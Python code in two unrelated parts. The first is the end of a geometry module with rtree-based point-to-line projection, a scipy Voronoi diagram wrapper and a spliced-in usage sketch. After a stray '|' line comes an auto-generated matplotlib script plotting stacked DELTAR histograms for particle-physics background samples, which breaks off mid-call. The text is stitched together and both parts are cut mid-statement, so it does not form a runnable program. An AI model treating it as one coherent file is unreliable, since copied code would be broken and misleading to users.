(start[0]*(1-t1) + end[0]*t1 + grid.xoffset, start[1]*(1-t1) + end[1]*t1 + grid.yoffset),
(start[0]*(1-t2) + end[0]*t2 + grid.xoffset, start[1]*(1-t2) + end[1]*t2 + grid.yoffset)
))
intervals.append((gx, gy, t1, t2))
t2 += delta
if t2 >= 1:
break
search = (start[0]*(1-t2) + end[0]*t2, start[1]*(1-t2) + end[1]*t2)
return segments, intervals
try:
import rtree as _rtree
except:
_logger.error("Failed to import `rtree`.")
_rtree = None
class ProjectPointLinesRTree():
"""Accelerated projection code using `rtree`.
:param lines: A list of linear segments (see
:func:`project_point_to_line`).
"""
def __init__(self, lines):
self._lines = list(lines)
def gen():
for i, line in enumerate(self._lines):
bds = self._bounds(line)
yield i, bds, None
self._idx = _rtree.index.Index(gen())
@staticmethod
def _bounds(line):
it = iter(line)
x, y = next(it)
xmin, xmax = x, x
ymin, ymax = y, y
for (x, y) in it:
xmin = min(xmin, x)
xmax = max(xmax, x)
ymin = min(ymin, y)
ymax = max(ymax, y)
return [xmin, ymin, xmax, ymax]
def project_point(self, point):
"""As :func:`project_point_to_lines` but uses `rtree` at a first pass.
:param point: Pair `(x,y)`
"""
point = _np.asarray(point)
h = 1
while True:
xmin, xmax = point[0] - h, point[0] + h
ymin, ymax = point[1] - h, point[1] + h
indices = list(self._idx.intersection((xmin,ymin,xmax,ymax)))
if len(indices) > 0:
choices = [self._lines[i] for i in indices]
best = project_point_to_lines(point, choices)
distsq = _np.sum((best - point)**2)
if distsq <= h*h:
return best
h += h
#############################################################################
# Voronoi cell stuff
#############################################################################
try:
import scipy.spatial as _spatial
except Exception as ex:
_logger.error("Failed to import `scipy.spatial` because {}".format(ex))
_spatial = None
class Voroni():
"""A wrapper around the `scipy.spatial` voroni diagram finding routine.
:param points: Array of shape `(N,n)` of `N` points in `n`-dimensional
space.
"""
def __init__(self, points):
points = _np.asarray(points)
if len(points.shape) != 2 or points.shape[1] != 2:
raise ValueError("Need array of shape (N,2)")
self._v = _spatial.Voronoi(points)
self._infinity_directions = dict()
centre = _np.mean(self._v.points, axis=0)
for ((a,b),(aa,bb)) in zip(self._v.ridge_vertices, self._v.ridge_points):
if a == -1:
x, y = self.perp_direction(self._v.points, aa, bb, centre)
self._infinity_directions[b] = x, y
@property
def voroni(self):
"""The `scipy.spatial.Voroni` class"""
return self._v
def polygons(self, inf_dist=1):
"""Return a list of polygons, one for each "region" of the voroni
diagram.
:param inf_dist: The distance to make each line towards the "point at
infinity".
:return: Iterator of "polygons". Each "polygon" is a list of `(x,y)`
points specifying the vertices.
"""
done = set()
for point_index in range(self._v.points.shape[0]):
region_index = self._v.point_region[point_index]
if region_index in done:
continue
done.add(region_index)
yield self._region_as_polygon(region_index, point_index, inf_dist)
def polygon_for(self, point_index, inf_dist=1):
"""Return the polygon from the diagram which contains the given point.
:param point_index: Index into `self.points`
:param inf_dist: The distance to make each line towards the "point at
infinity".
:return: A "polygon", which is a list of `(x,y)` points specifying the
vertices.
"""
region_index = self._v.point_region[point_index]
return self._region_as_polygon(region_index, point_index, inf_dist)
def polygon_for_by_distance(self, point_index, distance):
"""Return the polygon from the diagram which contains the given point.
Scale the size so that the containing point is `distance` away from
"infinity".
"""
region_index = self._v.point_region[point_index]
poly, extra = self._region_datum(region_index, point_index)
if extra is not None:
inf_index, (first, second) = extra
x1 = _np.asarray([first[0], first[1]])
dx1 = _np.asarray([first[2], first[3]])
x2 = _np.asarray([second[0], second[1]])
dx2 = _np.asarray([second[2], second[3]])
pt = self.points[point_index]
def dist(t):
return self._distance_line_to_point(x1 + t * dx1, x2 + t * dx2, pt)
res = _optimize.minimize(dist, [0], bounds=[[0,_np.inf]])
tzero = res.x
if dist(tzero) > distance:
t0 = 1
else:
t_up = tzero * 2
while dist(t_up) < 1.1 * distance:
t_up += t_up + 1
t0 = _optimize.brentq(lambda x : dist(x) - distance, tzero, t_up)
poly[inf_index] = x1 + t0 * dx1
poly.insert(inf_index, x2 + t0 * dx2)
return poly
def _region_datum(self, region_index, point_index):
region = self._v.regions[region_index]
containing_points = {point_index}
poly = [self._v.vertices[k] for k in region]
if -1 in region:
inf_index = region.index(-1)
after_vertex = region[(inf_index + 1) % len(region)]
choices = self._find_perp_line_to_infinity(after_vertex, containing_points)
a, b = choices[0]
dx, dy = self.perp_direction(self._v.points, a, b)
x, y = self._v.vertices[after_vertex]
extras = [(x, y, dx, dy)]
before_vertex = region[(inf_index - 1) % len(region)]
if before_vertex == after_vertex:
a, b = choices[1]
else:
a, b = self._find_perp_line_to_infinity(before_vertex, containing_points)[0]
dx, dy = self.perp_direction(self._v.points, a, b)
x, y = self._v.vertices[before_vertex]
extras.append((x, y, dx, dy))
return poly, (inf_index, extras)
else:
return poly, None
def _region_as_polygon(self, region_index, point_index, inf_dist):
poly, extra = self._region_datum(region_index, point_index)
if extra is not None:
inf_index, (first, second) = extra
x, y, dx, dy = first
poly[inf_index] = x + dx * inf_dist, y + dy * inf_dist
x, y, dx, dy = second
poly.insert(inf_index, (x + dx * inf_dist, y + dy * inf_dist))
return poly
@staticmethod
def _distance_line_to_point(line_start, line_end, point):
a = _np.asarray(line_start)
b = _np.asarray(line_end)
v = b - a
vnormsq = _np.sum(v * v)
x = _np.asarray(point) - a
if vnormsq < 1e-12:
return _np.sqrt(_np.sum(x * x))
t = _np.sum(x * v) / vnormsq
u = x - t * v
return _np.sqrt(_np.sum(u * u))
def _find_perp_line_to_infinity(self, vertex, containing_points):
out = []
for verts, between in zip(self._v.ridge_vertices, self._v.ridge_points):
if set(verts) == {-1, vertex}:
if len(set(between).intersection(containing_points)) > 0:
out.append(between)
return out
@property
def points(self):
"""The input points"""
return self._v.points
@property
def vertices(self):
"""The voroni diagram vertices. An array of shape `(M,2)`.
"""
return self._v.vertices
@property
def regions(self):
"""A list of the regions of the diagram. Each region is a list of
        indices into `vertices`, where `-1` means the point at infinity."""
return self._v.regions
@property
def point_region(self):
"""A list, ordered as `points`, giving which "region" each input
point is in."""
return self._v.point_region
@property
def ridge_vertices(self):
"""The "ridges" of the diagram are the lines forming the boundaries
        between regions. This gives a list of pairs of indices into
`vertices`, where `-1` means the point at infinity."""
return self._v.ridge_vertices
@property
def ridge_points(self):
"""Each "ridge" is perpendicular to a line between two points in the
input data. For each entry of `ridge_vertices` the perpendicular line
        is given by the indices of the corresponding entry in this list.
"""
return self._v.ridge_points
@staticmethod
def perp_direction(points, a, b, centre=None):
"""Find a vector perpendicular to the line specified, oriented away
from `centre`.
:param points: Array of shape `(N,n)` of `N` points in `n`-dimensional
space.
:param a: Index into `points` of start of line.
:param b: Index into `points` of end of line.
:param centre: The location to orient from; if `None` then compute
as centroid of the `points`.
:return: Tuple of size `n` giving a vector orthogonal to the line,
and oriented away from `centre`.
"""
diff = points[b] - points[a]
norm = _np.sqrt(_np.sum(diff*diff))
diff = _np.asarray([diff[1]/norm, -diff[0]/norm])
if centre is None:
centre = _np.mean(points, axis=0)
else:
centre = _np.asarray(centre)
midpoint = (points[a] + points[b]) / 2
if _np.dot(centre - midpoint, diff) <= 0:
return diff
else:
return -diff
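# Hedged usage sketch (illustrative only, not part of the module's API): a
# couple of quick sanity checks for the point/line helpers above. The numbers
# are assumptions chosen so the expected results are easy to verify by hand.
if __name__ == "__main__":
    # Closest point on the segment (0,0)-(1,0) to (0.5,-1) is (0.5, 0).
    print(project_point_to_line((0.5, -1.0), [[0.0, 0.0], [1.0, 0.0]]))
    # The segment (0,5)->(10,5) crosses the half-open box 2<=x<4, 4<=y<6
    # for the parameter range t in [0.2, 0.4).
    print(intersect_line_box((0.0, 5.0), (10.0, 5.0), (2.0, 4.0, 4.0, 6.0)))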
|
def selection_6():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(0.0,15.0,76,endpoint=True)
# Creating data sequence: middle of each bin
xData = numpy.array([0.1,0.3,0.5,0.7,0.9,1.1,1.3,1.5,1.7,1.9,2.1,2.3,2.5,2.7,2.9,3.1,3.3,3.5,3.7,3.9,4.1,4.3,4.5,4.7,4.9,5.1,5.3,5.5,5.7,5.9,6.1,6.3,6.5,6.7,6.9,7.1,7.3,7.5,7.7,7.9,8.1,8.3,8.5,8.7,8.9,9.1,9.3,9.5,9.7,9.9,10.1,10.3,10.5,10.7,10.9,11.1,11.3,11.5,11.7,11.9,12.1,12.3,12.5,12.7,12.9,13.1,13.3,13.5,13.7,13.9,14.1,14.3,14.5,14.7,14.9])
# Creating weights for histo: y7_DELTAR_0
y7_DELTAR_0_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,25.8787050387,48.4821569834,62.6681443967,71.4868165721,75.0772933864,77.3044914103,68.5676991622,56.5270298455,46.3450388796,39.3932730477,33.0883866418,27.9093712369,23.3362792945,19.9586582914,16.8758130267,14.5258111117,11.9956653566,9.99775112933,8.55663640798,6.53415820246,5.56385906337,4.20871626575,3.34486663221,2.70209520252,2.01019501642,1.50662266322,1.11359061195,0.859757637166,0.573171891444,0.311150363927,0.200610102005,0.0818816873491,0.00818816873491,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_1
y7_DELTAR_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0243067199767,0.0,0.0,0.0242945760233,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_2
y7_DELTAR_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0301235473445,0.0301201301501,0.0602001795444,0.07029003463,0.170647867166,0.0702986705867,0.110519502419,0.070259953403,0.080279563865,0.0903759888888,0.110412193426,0.0903980539647,0.0100457331979,0.0602205091649,0.0702763989089,0.0100369732801,0.0100340932506,0.0201103993878,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_3
y7_DELTAR_3_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.115514678532,0.137468441067,0.32449557438,0.401432017002,0.505913588194,0.588625228483,0.544406103719,0.506126060997,0.594246616965,0.407111297214,0.390549671913,0.313482576798,0.285907750787,0.253083830895,0.275016427402,0.120956216709,0.104539828553,0.0605001072115,0.0660036809464,0.0384954040172,0.00551421768798,0.00550877789671,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_4
y7_DELTAR_4_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0868390655213,0.199335150448,0.307919946725,0.387786392682,0.495404910669,0.496345255327,0.522048810971,0.443091124353,0.411545086299,0.287165425818,0.235871989614,0.155924856794,0.146079536407,0.101652219522,0.0651206312155,0.0384886074746,0.0286232536578,0.0138174027603,0.00986914966675,0.00197291163428,0.00197407403816,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_5
y7_DELTAR_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0363016452016,0.0746097333537,0.127303637754,0.163844650115,0.207199014107,0.222824918288,0.227387318367,0.179241530038,0.131321845148,0.0965403664611,0.0620102382963,0.0491625936153,0.0274789978195,0.0166353474019,0.0103369482515,0.00352911856957,0.00201570634945,0.000756662697875,0.000756519057574,0.0,0.000504354307369,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_6
y7_DELTAR_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0114511954272,0.0331991204441,0.047528882664,0.0718684875137,0.085902275404,0.106799386691,0.0916263185676,0.0658524988544,0.0434946203898,0.0294804568192,0.0163342720103,0.0108731127544,0.00515766010433,0.000859006658699,0.000858866099384,0.00142981713639,0.000285168757298,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_7
y7_DELTAR_7_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00129592372255,0.00295905220822,0.00386564921218,0.00611157314405,0.00848027570987,0.0116604938285,0.00958793251804,0.00509809128351,0.0026786190709,0.00151253490312,0.000970509904428,0.000302351663836,0.000172841392388,0.000129582942606,6.47735549708e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_8
y7_DELTAR_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000169965676692,0.000311772196928,0.000595852074499,0.000763864132964,0.000934732747442,0.00133389450317,0.000623547215073,0.000511421229446,0.000311011359367,0.000113616167064,2.84292656694e-05,8.50337984264e-05,0.0,2.84489102457e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_9
y7_DELTAR_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_10
y7_DELTAR_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.0529581672,0.0,0.0,0.0,1.0521138287,0.0,1.05462838872,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_11
y7_DELTAR_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.460540223078,0.461016717805,1.38163834565,2.76536711978,1.38236653719,4.14433209946,2.53295143703,0.690788239096,1.61159739067,1.3832088569,0.690965387539,0.690784012127,0.230465320669,0.0,0.461458243967,0.0,0.230360184413,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_12
y7_DELTAR_12_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.525788722102,0.830934494971,1.35684977532,1.52284879879,1.85491724136,1.60630299698,1.24655522799,1.10780200164,0.858689987152,0.553686928898,0.304478553194,0.138431945359,0.193781750681,0.0830468652927,0.0552968355042,0.02771791323,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_13
y7_DELTAR_13_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.20152539658,0.231967957427,0.393278166664,0.453863425926,0.413352988485,0.645125407205,0.413398322878,0.312568806426,0.201600529082,0.141095318098,0.0302722746709,0.0604623708924,0.0504291960467,0.0301716832966,0.0201542085948,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_14
y7_DELTAR_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0594504139488,0.0933353246716,0.155640889157,0.138622908449,0.282903331025,0.26593794489,0.209369382748,0.104673014378,0.0905212648482,0.0197882643018,0.0169763090309,0.0113135162088,0.0113285173973,0.00282347952324,0.00565245858451,0.0,0.0,0.00283198083794,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_15
y7_DELTAR_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0136881402288,0.0197592221531,0.0167628609754,0.00759898478221,0.0167790056467,0.0137200513654,0.00916855176561,0.00458510202668,0.00152260679112,0.00151881882101,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_16
y7_DELTAR_16_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000541741113055,0.00108418443755,0.00162474942344,0.00108258713751,0.00162513248286,0.00180581294981,0.00126438482902,0.000180755038415,0.00036094919314,0.0,0.000180003625974,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
pad = fig.add_subplot(frame[0])
# Creating a new Stack
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights+y7_DELTAR_16_weights,\
label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#e5e5e5", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights,\
label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#f2f2f2", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights,\
label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights,\
label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights,\
label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights,\
label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights,\
label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights,\
label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights,\
label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights,\
label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights,\
label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights,\
label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights,\
label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights,\
label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights,\
